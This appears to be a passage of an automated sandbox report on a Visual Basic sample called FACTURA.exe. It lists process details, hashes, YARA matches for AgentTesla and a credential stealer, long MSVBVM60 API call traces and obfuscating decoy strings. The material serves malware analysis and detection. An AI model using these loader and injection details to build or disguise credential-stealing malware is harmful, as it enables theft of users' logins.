                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:18:03:30
                                                          Start date:06/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\FACTURA.exe'
                                                          Imagebase:0x7ff6417f0000
                                                          File size:65440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:moderate

                                                          General

                                                          Start time:18:03:30
                                                          Start date:06/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff61f6a0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >

                                                            Executed Functions

                                                            APIs
                                                            • __vbaChkstk.MSVBVM60(?,00401336), ref: 0041395E
                                                            • __vbaAryConstruct2.MSVBVM60(?,004115AC,00000008,?,?,?,?,00401336), ref: 004139A7
                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401336), ref: 004139C7
                                                            • #704.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 004139F7
                                                            • __vbaStrMove.MSVBVM60 ref: 00413A02
                                                            • __vbaFreeVar.MSVBVM60 ref: 00413A0E
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 00413A2E
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410E44,0000004C), ref: 00413A94
                                                            • __vbaChkstk.MSVBVM60 ref: 00413ACE
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410E64,0000002C), ref: 00413B30
                                                            • __vbaFreeObj.MSVBVM60 ref: 00413B4B
                                                            • #707.MSVBVM60(00000001,00000000,?,?,?,?,00401336), ref: 00413B5C
                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,00401336), ref: 00413B67
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004108CC,000000D8), ref: 00413BB0
                                                            • __vbaSetSystemError.MSVBVM60(?,00000001), ref: 00413BDC
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413C24
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413C41
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413C6D
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413C8A
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413CB6
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413CD3
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413CFF
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413D1C
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413D48
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413D65
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413D91
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413DAE
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413DDA
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413DF7
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413E23
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413E40
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413E6C
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413E89
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413EB5
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413ED2
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413EFE
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413F1B
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413F47
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413F64
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413F90
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413FAD
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413FD9
                                                            • __vbaStrCopy.MSVBVM60 ref: 00413FF6
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414022
                                                            • __vbaStrCopy.MSVBVM60 ref: 0041403F
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041406B
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414088
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004140B4
                                                            • __vbaStrCopy.MSVBVM60 ref: 004140D1
                                                            • __vbaStrCopy.MSVBVM60 ref: 0041411A
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414146
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414163
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041418F
                                                            • __vbaStrCopy.MSVBVM60 ref: 004141AC
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004141D8
                                                            • __vbaStrCopy.MSVBVM60 ref: 004141F5
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414221
                                                            • __vbaStrCopy.MSVBVM60 ref: 0041423E
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041426A
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414287
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004142B3
                                                            • __vbaStrCopy.MSVBVM60 ref: 004142D0
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004142FC
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414319
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414345
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414362
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041438E
                                                            • __vbaStrCopy.MSVBVM60 ref: 004143AB
                                                            • __vbaStrCopy.MSVBVM60 ref: 004143F4
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414420
                                                            • __vbaStrCopy.MSVBVM60 ref: 0041443D
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414469
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414486
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004144B2
                                                            • __vbaStrCopy.MSVBVM60 ref: 004144CF
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004144FB
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414518
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414544
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414561
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041458D
                                                            • __vbaStrCopy.MSVBVM60 ref: 004145AA
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004145D6
                                                            • __vbaStrCopy.MSVBVM60 ref: 004145F3
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041461F
                                                            • __vbaStrCopy.MSVBVM60 ref: 0041463C
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414668
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414685
                                                            • __vbaStrCopy.MSVBVM60 ref: 004146CE
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004146FA
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414717
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414743
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414760
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041478C
                                                            • __vbaStrCopy.MSVBVM60 ref: 004147A9
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004147D5
                                                            • __vbaStrCopy.MSVBVM60 ref: 004147F2
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041481E
                                                            • __vbaStrCopy.MSVBVM60 ref: 0041483B
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414867
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414884
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004148B0
                                                            • __vbaStrCopy.MSVBVM60 ref: 004148CD
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004148F9
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414916
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414942
                                                            • __vbaStrCopy.MSVBVM60 ref: 0041495F
                                                            • __vbaStrCopy.MSVBVM60 ref: 004149A8
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004149D4
                                                            • __vbaStrCopy.MSVBVM60 ref: 004149F1
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414A1D
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414A3A
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414A66
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414A83
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414AAF
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414ACC
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414AF8
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414B15
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414B41
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414B5E
                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00414B8A
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414BA7
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 00414BC7
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000037,00410E44,00000014), ref: 00414C2D
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041149C,00000130), ref: 00414C90
                                                            • __vbaStrMove.MSVBVM60 ref: 00414CC1
                                                            • __vbaFreeObj.MSVBVM60 ref: 00414CCA
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004108CC,00000084), ref: 00414D32
                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00414D5E
                                                            • #594.MSVBVM60(0000000A), ref: 00414D96
                                                            • __vbaFreeVar.MSVBVM60 ref: 00414DA2
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 00414DC2
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E44,00000014), ref: 00414E28
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041149C,000000B8), ref: 00414E8E
                                                            • __vbaFreeObj.MSVBVM60 ref: 00414EB4
                                                            • __vbaVarDup.MSVBVM60 ref: 00414EE8
                                                            • #600.MSVBVM60(0000000A,00000002), ref: 00414EF7
                                                            • __vbaFreeVar.MSVBVM60 ref: 00414F06
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004108FC,000006F8), ref: 00414F80
                                                            • __vbaStrCopy.MSVBVM60 ref: 00414FA7
                                                            • __vbaFreeStr.MSVBVM60 ref: 00414FDD
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004108FC,000006FC), ref: 00415033
                                                            • __vbaStrToAnsi.MSVBVM60(?,Thoraxkirurgi,007CA56D), ref: 00415096
                                                            • __vbaStrToAnsi.MSVBVM60(?,batikfarvningernes,00000000), ref: 004150A6
                                                            • __vbaSetSystemError.MSVBVM60(004AF4B5,0066CFDD,?,00000000), ref: 004150C6
                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004150EE
                                                            • #611.MSVBVM60(?,?,00401336), ref: 0041510D
                                                            • __vbaStrMove.MSVBVM60(?,?,00401336), ref: 00415118
                                                            • #680.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,40490000,0000000A,0000000A,0000000A), ref: 0041518B
                                                            • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A), ref: 004151AB
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0,?,?,?,?,?,?,00401336), ref: 004151CE
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410E44,0000001C), ref: 00415234
                                                            • __vbaChkstk.MSVBVM60 ref: 0041526E
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411598,00000060), ref: 004152D5
                                                            • __vbaFreeObj.MSVBVM60 ref: 004152F0
                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,0041537F,?,?,00401336), ref: 00415354
                                                            • __vbaFreeStr.MSVBVM60(?,?,00401336), ref: 0041535D
                                                            • __vbaFreeStr.MSVBVM60(?,?,00401336), ref: 00415366
                                                            • __vbaFreeStr.MSVBVM60(?,?,00401336), ref: 0041536F
                                                            • __vbaFreeStr.MSVBVM60(?,?,00401336), ref: 00415378
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.67797531745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.67797509297.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797658071.0000000000417000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797685075.0000000000418000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: __vba$Copy$Error$BoundsGenerate$Free$CheckHresult$MoveNew2$ChkstkSystem$AnsiList$#594#600#611#680#704#707Construct2Destruct
                                                            • String ID: 7$BASIPTERYGOID$Bigbandene$Brumous$Cleaned$Digitaliseret3$Efficiently3$Elskovsdigte$FOURAGR$FUSKET$Famles$Fluffy7$Folkeskoleforlig6$Forstuvelserne7$Imitationen$Jejunostomy3$KUTTES$Kalenderprogrammerne1$LIMERICK$LSNINGSMETODES$Libertinism6$Mortificer$Musikgruppers$NONMUTUAL$Northampton6$OWL$Optimaenes$Outkitchen7$Overagitation3$PHAGOCYTOLYTIC$Plyndringstogtet2$Postclimax6$Promptbooks7$Q$Quinovatannic$REDIGERINGSPROGRAMMERNE$REVISIONISM$Randsyedes5$Repleve$Runger$SOLUTIONEN$SWORDFISH$Saddlefast$Sardinerne$Sinecureposter1$Solbrillernes$TIDSSTANDARDERS$TILREGNELIGT$Thoraxkirurgi$Tistykpakken9$Untriabness7$VIGOURS$VIRKSOMHDSOVERDRAGELSENS$Vaginoscope$afteryears$artrig$barderingernes$batikfarvningernes$boltede$dressrs$gruppere$mosts$tritium$undenizened
                                                            • API String ID: 1279495490-1632438943
                                                            • Opcode ID: a0e9982cd5da1417ac51a1d3045938444eb91d94b2232c3c92bfa13dcc2b7e81
                                                            • Instruction ID: 7c75f863a0a8e158e6534295db5c761af2ec3250205020a5cc8b02275b736efd
                                                            • Opcode Fuzzy Hash: a0e9982cd5da1417ac51a1d3045938444eb91d94b2232c3c92bfa13dcc2b7e81
                                                            • Instruction Fuzzy Hash: 14F23B7494121ADFDB24DF50CA58BEDBBB0FB48305F1080EAEA1AA7660D7741AC5DF09
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.67797531745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.67797509297.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797658071.0000000000417000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797685075.0000000000418000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: #100
                                                            • String ID: VB5!6!*
                                                            • API String ID: 1341478452-2574520878
                                                            • Opcode ID: 45d37bb7554b147fb195d0f13d96b1f7d17722c8b4907e57794e35e7f18f844a
                                                            • Instruction ID: 8040a630be8bfb79c86d949a1be7c8411f78295c56c9d7abfc817ba9f4470088
                                                            • Opcode Fuzzy Hash: 45d37bb7554b147fb195d0f13d96b1f7d17722c8b4907e57794e35e7f18f844a
                                                            • Instruction Fuzzy Hash: 1801AEA104EBC92FE30746719D664A67FB8D80326430A42DBE8D1DB4B3C05D0C8AD7B3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            APIs
                                                            • __vbaVarDup.MSVBVM60 ref: 00415A15
                                                            • #547.MSVBVM60(?,?), ref: 00415A23
                                                            • __vbaVarTstNe.MSVBVM60(?,?), ref: 00415A45
                                                            • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415A58
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 00415A7C
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,00000014), ref: 00415AA7
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041149C,00000138), ref: 00415AD8
                                                            • __vbaFreeObj.MSVBVM60 ref: 00415ADD
                                                            • #535.MSVBVM60 ref: 00415AE3
                                                            • #570.MSVBVM60(000000C1), ref: 00415AF0
                                                            • #591.MSVBVM60(?), ref: 00415B17
                                                            • __vbaStrMove.MSVBVM60 ref: 00415B22
                                                            • __vbaStrCmp.MSVBVM60(Double,00000000), ref: 00415B2E
                                                            • __vbaFreeStr.MSVBVM60 ref: 00415B41
                                                            • __vbaFreeVar.MSVBVM60 ref: 00415B4A
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 00415B6B
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,00000014), ref: 00415B90
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041149C,000000C0), ref: 00415BB9
                                                            • __vbaFreeObj.MSVBVM60 ref: 00415BBE
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 00415BD6
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,00000014), ref: 00415BFB
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041149C,000000E8), ref: 00415C21
                                                            • __vbaStrMove.MSVBVM60 ref: 00415C2C
                                                            • __vbaFreeObj.MSVBVM60 ref: 00415C35
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 00415C4D
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,00000038,?,?,?,?,?,?,?,00000005), ref: 00415CC3
                                                            • __vbaVar2Vec.MSVBVM60(?,00000005,?,?,?,?,?,?,?,00000005), ref: 00415CD1
                                                            • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000005), ref: 00415CDF
                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,00000005), ref: 00415CE8
                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,00415D42), ref: 00415D32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.67797531745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.67797509297.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797658071.0000000000417000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797685075.0000000000418000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: __vba$CheckFreeHresult$New2$Move$#535#547#570#591DestructListVar2
                                                            • String ID: 9:9:9$Double$Lanuginousness6$bastards
                                                            • API String ID: 1310651223-668341364
                                                            • Opcode ID: c1aab3d7c333afcae06a6f2e01ef72ef4ec6a89ae80a992cf78c321185aab543
                                                            • Instruction ID: 2b7318f3741476967b46d65e138912111c3b35d5e704b885aa54b6c594cd048b
                                                            • Opcode Fuzzy Hash: c1aab3d7c333afcae06a6f2e01ef72ef4ec6a89ae80a992cf78c321185aab543
                                                            • Instruction Fuzzy Hash: B9A12C70900219EFCB10DFA5DD88ADDBBB8FF48705F20856AE149B72A0D7745989CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __vbaStrCopy.MSVBVM60 ref: 00415405
                                                            • #673.MSVBVM60(00000000,40280000,00000000,3FF00000,00000000,3FF00000,00000000,3FF00000,?), ref: 00415436
                                                            • __vbaFpR8.MSVBVM60 ref: 0041543C
                                                            • __vbaFreeVar.MSVBVM60 ref: 00415454
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 00415477
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,00000014), ref: 004154A2
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041149C,00000078), ref: 004154CA
                                                            • __vbaFreeObj.MSVBVM60 ref: 004154CF
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 004154E7
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,00000014), ref: 0041550C
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041149C,000000D0), ref: 00415532
                                                            • __vbaStrMove.MSVBVM60 ref: 00415543
                                                            • __vbaFreeObj.MSVBVM60 ref: 00415548
                                                            • __vbaFpI4.MSVBVM60 ref: 00415559
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,004012C8,004108CC,00000064), ref: 00415578
                                                            • #713.MSVBVM60(004115C8), ref: 0041558D
                                                            • __vbaStrMove.MSVBVM60 ref: 00415598
                                                            • __vbaStrCmp.MSVBVM60(004115D4,00000000), ref: 004155A0
                                                            • __vbaFreeStr.MSVBVM60 ref: 004155B3
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 004155D5
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,00000014), ref: 004155FA
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041149C,000000D8), ref: 00415620
                                                            • __vbaStrMove.MSVBVM60 ref: 0041562F
                                                            • __vbaFreeObj.MSVBVM60 ref: 00415634
                                                            • #554.MSVBVM60 ref: 0041563A
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,004012C8,004108CC,00000160), ref: 00415662
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 00415677
                                                            • __vbaObjSet.MSVBVM60(?,?,Counterretaliation7), ref: 00415699
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,00000040), ref: 004156B3
                                                            • __vbaFreeObj.MSVBVM60 ref: 004156B8
                                                            • __vbaFreeStr.MSVBVM60(00415702), ref: 004156F5
                                                            • __vbaFreeStr.MSVBVM60 ref: 004156FA
                                                            • __vbaFreeStr.MSVBVM60 ref: 004156FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.67797531745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.67797509297.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797658071.0000000000417000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797685075.0000000000418000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: __vba$CheckFreeHresult$New2$Move$#554#673#713Copy
                                                            • String ID: Counterretaliation7
                                                            • API String ID: 2817377203-3212010965
                                                            • Opcode ID: c0a2c88e1a687cbdf032f3248d7e822f7cc2112227db2875e2ab5716a45e11d6
                                                            • Instruction ID: 6f37d4b53ab8d93c070941a2451dc558aec7e1f796efaaddc750038558b635de
                                                            • Opcode Fuzzy Hash: c0a2c88e1a687cbdf032f3248d7e822f7cc2112227db2875e2ab5716a45e11d6
                                                            • Instruction Fuzzy Hash: 90914075A00214EBCB009FA5DD88FDEBBB9FF59705F10812AE505F71A0D7749885CBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __vbaStrCopy.MSVBVM60 ref: 00415779
                                                            • __vbaVarDup.MSVBVM60 ref: 00415793
                                                            • #513.MSVBVM60(?,?,00000002), ref: 004157A3
                                                            • __vbaVarTstNe.MSVBVM60(?,?), ref: 004157BF
                                                            • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004157D2
                                                            • #648.MSVBVM60(?), ref: 004157F6
                                                            • __vbaFreeVar.MSVBVM60 ref: 004157FF
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 00415817
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,00000014), ref: 00415842
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041149C,000000C8), ref: 00415870
                                                            • __vbaFreeObj.MSVBVM60 ref: 00415875
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 0041588D
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,0000001C), ref: 004158B2
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411598,00000064), ref: 004158D4
                                                            • __vbaFreeObj.MSVBVM60 ref: 004158D9
                                                            • #554.MSVBVM60 ref: 004158E7
                                                            • __vbaNew2.MSVBVM60(00410E54,004175C0), ref: 004158FF
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,023D004C,00410E44,0000004C), ref: 00415924
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410E64,00000028), ref: 00415940
                                                            • __vbaFreeObj.MSVBVM60 ref: 00415945
                                                            • __vbaFreeStr.MSVBVM60(0041597D), ref: 00415976
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.67797531745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.67797509297.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797658071.0000000000417000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797685075.0000000000418000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: __vba$CheckFreeHresult$New2$#513#554#648CopyList
                                                            • String ID:
                                                            • API String ID: 2928652336-0
                                                            • Opcode ID: 9ca2bfb4b745f5579fad8ddafd8b07ffa7839ddb11e7b88c3f6335a33886aa2c
                                                            • Instruction ID: a0856fc22bc3339d20b1beca13237d2db391ad5e51debdd358cc20d27187667e
                                                            • Opcode Fuzzy Hash: 9ca2bfb4b745f5579fad8ddafd8b07ffa7839ddb11e7b88c3f6335a33886aa2c
                                                            • Instruction Fuzzy Hash: 97617EB0901209EFDB10DFA5DE89ADD7BB9FB48705F20412AE109B71A0D7746D89CF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __vbaVarDup.MSVBVM60 ref: 00415DBB
                                                            • #617.MSVBVM60(?,?,00000001), ref: 00415DCB
                                                            • __vbaVarTstNe.MSVBVM60(?,?), ref: 00415DE7
                                                            • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415DFA
                                                            • #598.MSVBVM60 ref: 00415E08
                                                            • #690.MSVBVM60(Skallesmkkeres,oronooko,udsvedningerne,IMMATEREALITY), ref: 00415E22
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004108CC,00000084), ref: 00415E5C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.67797531745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.67797509297.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797658071.0000000000417000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797685075.0000000000418000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: __vba$#598#617#690CheckFreeHresultList
                                                            • String ID: IMMATEREALITY$Skallesmkkeres$oronooko$udsvedningerne
                                                            • API String ID: 312711274-2447670401
                                                            • Opcode ID: 487bbf5b0154ab79348763b580cd09220e74dd3999724edae5351beb1dd2907b
                                                            • Instruction ID: 39464a7016236efeeae4a9f846be378d4a47776ac86471a8f487a3685649897f
                                                            • Opcode Fuzzy Hash: 487bbf5b0154ab79348763b580cd09220e74dd3999724edae5351beb1dd2907b
                                                            • Instruction Fuzzy Hash: 4D2157B0940219EFCB109F94DD4AAEEBBB8FF84B44F14811AE545B71A0C7B81589CB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • #632.MSVBVM60(?,?,00000000,?), ref: 00415FC0
                                                            • __vbaStrVarVal.MSVBVM60(?,?), ref: 00415FCE
                                                            • #516.MSVBVM60(00000000), ref: 00415FD5
                                                            • __vbaFreeStr.MSVBVM60 ref: 00415FE9
                                                            • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00415FF9
                                                            • #617.MSVBVM60(00000002,?,000000FF), ref: 0041601A
                                                            • #617.MSVBVM60(00000002,?,00000000), ref: 00416038
                                                            • __vbaStrVarMove.MSVBVM60(00000002), ref: 00416042
                                                            • __vbaStrMove.MSVBVM60 ref: 0041604D
                                                            • __vbaFreeVar.MSVBVM60 ref: 00416056
                                                            • __vbaFreeStr.MSVBVM60(0041608A), ref: 00416083
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.67797531745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.67797509297.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797658071.0000000000417000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.67797685075.0000000000418000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: __vba$Free$#617Move$#516#632List
                                                            • String ID:
                                                            • API String ID: 3155365896-0
